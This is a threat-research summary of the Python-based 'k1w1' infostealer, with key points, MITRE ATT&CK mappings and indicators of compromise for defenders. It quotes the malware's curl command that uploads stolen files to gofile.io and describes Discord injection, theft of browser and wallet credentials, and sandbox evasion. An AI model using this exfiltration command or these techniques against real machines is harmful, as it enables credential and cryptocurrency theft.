Threat Research

“K1w1” InfoStealer Uses gofile.io for Exfiltration

Securonix

The k1w1 infostealer is a Python-based malware that exfiltrates data using gofile.io and searches for credentials and wallet information across user directories. It targets major browsers and wallet applications, injects into Discord to harvest data, and employs anti-VM/IP checks to evade analysis. #k1w1 #gofileio

Keypoints

  • The k1w1 infostealer is a Python-based tool with a VirusTotal score of 7/65 and a SHA256 hash a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c.
  • It uses gofile.io for data exfiltration, selecting a server via API (https://api.gofile.io/getServer) and uploading files with a curl-based command: “curl -F “file=@{path}” https://{gofileserver}.gofile.io/uploadFile”.
  • Collected data are uploaded and a download link is returned in JSON data, with links shared on a Discord channel.
  • The malware searches for sensitive keywords in common directories (Desktop, Downloads, Documents, Recent) across multiple browsers and wallets, indicating targeted data collection.
  • Targets browser data by enumerating paths for Opera, Chrome, Brave, Yandex, Edge, and related profiles to collect Local Storage and LevelDB information.
  • The script also searches for cryptocurrency wallets (Metamask, Exodus, Binance, Coinbase, etc.) and can inject into Discord to modify code for remote webhook exfiltration.
  • Anti-analysis techniques include VM, IP address, and suspicious process checks to evade sandboxes and automated defenses.

MITRE Techniques

  • [T1567.002] Exfiltration to Cloud Storage – The malware uploads data to a gofile.io server using a curl-based upload; “curl -F “file=@{path}” https://{gofileserver}.gofile.io/uploadFile”.
  • [T1083] File and Directory Discovery – It searches common directories (Desktop, Downloads, Documents, Recent) for files and keywords.
  • [T1119] Automated Collection – Automates data collection from the local system by scanning for keywords and targeted paths in parallel threads.
  • [T1555.003] Credentials from Web Browsers – Targets browser data (Opera, Chrome, Brave, Yandex, Edge) to harvest tokens and credentials from Local Storage/LevelDB.
  • [T1059.007] JavaScript – Discord Injection – Modifies Discord-related JavaScript (index.js) to enable data exfiltration via a webhook. “injected content writes … index.js”.
  • [T1497] Virtualization/Sandbox Evasion – Employs anti-analysis checks such as VM detection, IP address checks, and suspicious processes detection.

Indicators of Compromise

  • [Hash] SHA256 – a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c
  • [Domain] gofile.io – Used for data exfiltration and storage of uploaded data
  • [Domain] api.gofile.io – API endpoint used to fetch an exfiltration server
  • [Domain] gofile.io (and related subdomains like store4.gofile.io) – Hosting exfil payloads
  • [File name] index.js – Modified in Discord installation to facilitate webhook-based data leakage
  • [File name] opera.exe and [File name] chrome.exe – Browser executables mentioned as data sources
  • [URL] https://www.virustotal.com/gui/file/a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c – VT reference for the sample hash

Read more: https://isc.sans.edu/diary/rss/30972

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint